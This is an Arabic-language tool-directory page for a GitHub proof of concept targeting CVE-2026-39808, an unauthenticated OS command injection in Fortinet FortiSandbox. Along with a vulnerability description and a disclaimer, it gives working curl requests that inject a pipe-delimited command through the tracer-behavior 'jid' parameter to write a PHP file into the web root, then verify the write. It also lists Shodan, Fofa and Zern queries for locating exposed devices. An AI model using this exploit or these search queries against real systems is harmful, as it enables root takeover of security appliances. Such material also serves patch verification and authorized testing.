Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - حقن أوامر نظام التشغيل عبر نقطة نهاية tracer-behavior | Kitploit
أدوات/GitHubGitHub/error-inside/cve-2026-39808
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - حقن أوامر نظام التشغيل عبر نقطة نهاية tracer-behavior

عرض المستودع
15منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 - حقن أوامر نظام التشغيل عبر نقطة نهاية tracer-behavior

Fortinet FortiSandbox هو حل متقدم للحماية من التهديدات ينشئ بيئات معزولة لتحليل الملفات وعناوين URL وحركة مرور الشبكة المشبوهة بحثًا عن سلوك خبيث. ويستخدم مزيجًا من التحليل الثابت والتحليل الديناميكي والتعلم الآلي المدعوم بالذكاء الاصطناعي واستخبارات التهديدات من FortiGuard لكشف التهديدات من نوع zero-day والبرمجيات الخبيثة المراوغة وبرمجيات الفدية والهجمات الموجّهة التي تتجاوز الدفاعات التقليدية القائمة على التوقيعات. يجب على المؤسسات نشر FortiSandbox للحماية من التهديدات الناشئة — لا سيما البرمجيات الخبيثة غير المعروفة والتهديدات المستمرة المتقدمة (APTs)؛ من خلال تفجير المحتوى المشبوه تلقائيًا في بيئة آمنة، معزولة قبل وصوله إلى أنظمة الإنتاج. يتكامل مع نسيج Fortinet Security Fabric الأوسع ويمكن نشره كـ جهاز مادي, جهاز افتراضي, خدمة سحابية, أو حل حاوٍ ليتناسب مع مختلف البنى الشبكية.

CVE-2026-39808 هي ثغرة حقن أوامر نظام التشغيل حرجة تؤثر على إصدارات FortiSandbox من 4.4.0 إلى 4.4.8. يعود سبب الخلل إلى عدم تحييد العناصر الخاصة بشكل صحيح في المدخلات التي يتحكم فيها المستخدم قبل استخدامها في بناء أوامر نظام التشغيل (CWE-78)، مما يؤثر تحديدًا على نقطة نهاية API غير محددة. يمكن لمهاجم غير مصادق استغلال هذه الثغرة عن طريق إرسال طلبات HTTP مصممة خصيصًا لتنفيذ بصلاحيات على النظام الأساسي. يمنح الاستغلال الناجح المهاجم سيطرة كاملة على جهاز ، مما يسمح له بالوصول إلى عينات البرمجيات الخبيثة التي تم تحليلها، وسرقة بيانات الإعدادات الحساسة، والتنقل إلى قطاعات الشبكة المتصلة، أو استخدام الجهاز المخترق كنقطة انطلاق لمزيد من الحركة الجانبية داخل بيئة المؤسسة. هذه الثغرة يتم استغلالها بنشاط على أرض الواقع.

أوامر نظام تشغيل عشوائية
الجذر (root)
FortiSandbox

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

الاستخدام

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

الموارد

  • OpenCVE - CVE-2026-39808 - حقن أوامر نظام التشغيل في إصدارات FortiSandbox 4.4.x
  • NIST - تفاصيل CVE-2026-39808
  • Fortinet FortiSandbox

إخلاء المسؤولية

يتم توفير هذا المستودع ومحتوياته بدقة لأغراض الأمن المشروع واختبار الاختراق المصرح به والدراسة التعليمية والأغراض الدفاعية. من خلال الوصول إلى هذه المواد أو استخدامها، فإنك تقر بأنك تتحمل المسؤولية الكاملة عن ضمان امتثال أنشطتك لجميع القوانين المعمول بها وبأنك حصلت على التصريح المناسب قبل اختبار أو تطبيق هذه التقنيات على أي نظام لا تملكه.

لا يتحمل مؤلفو هذا المشروع والقائمون عليه أي مسؤولية عن أي أضرار أو عواقب قانونية أو إساءة استخدام ناتجة عن تطبيق هذه المعلومات. أي استخدام للوصول غير المصرح به أو الأنشطة الخبيثة أو الأغراض غير القانونية محظور تمامًا وغير مدعوم.

استخدم بمسؤولية. التزم بالقانون. اختبر فقط ما تملكه أو لديك إذن كتابي صريح لاختباره.

المؤلفون

  • ErrorInside // SCT

الترخيص

SCT-PL

تنزيل الأداة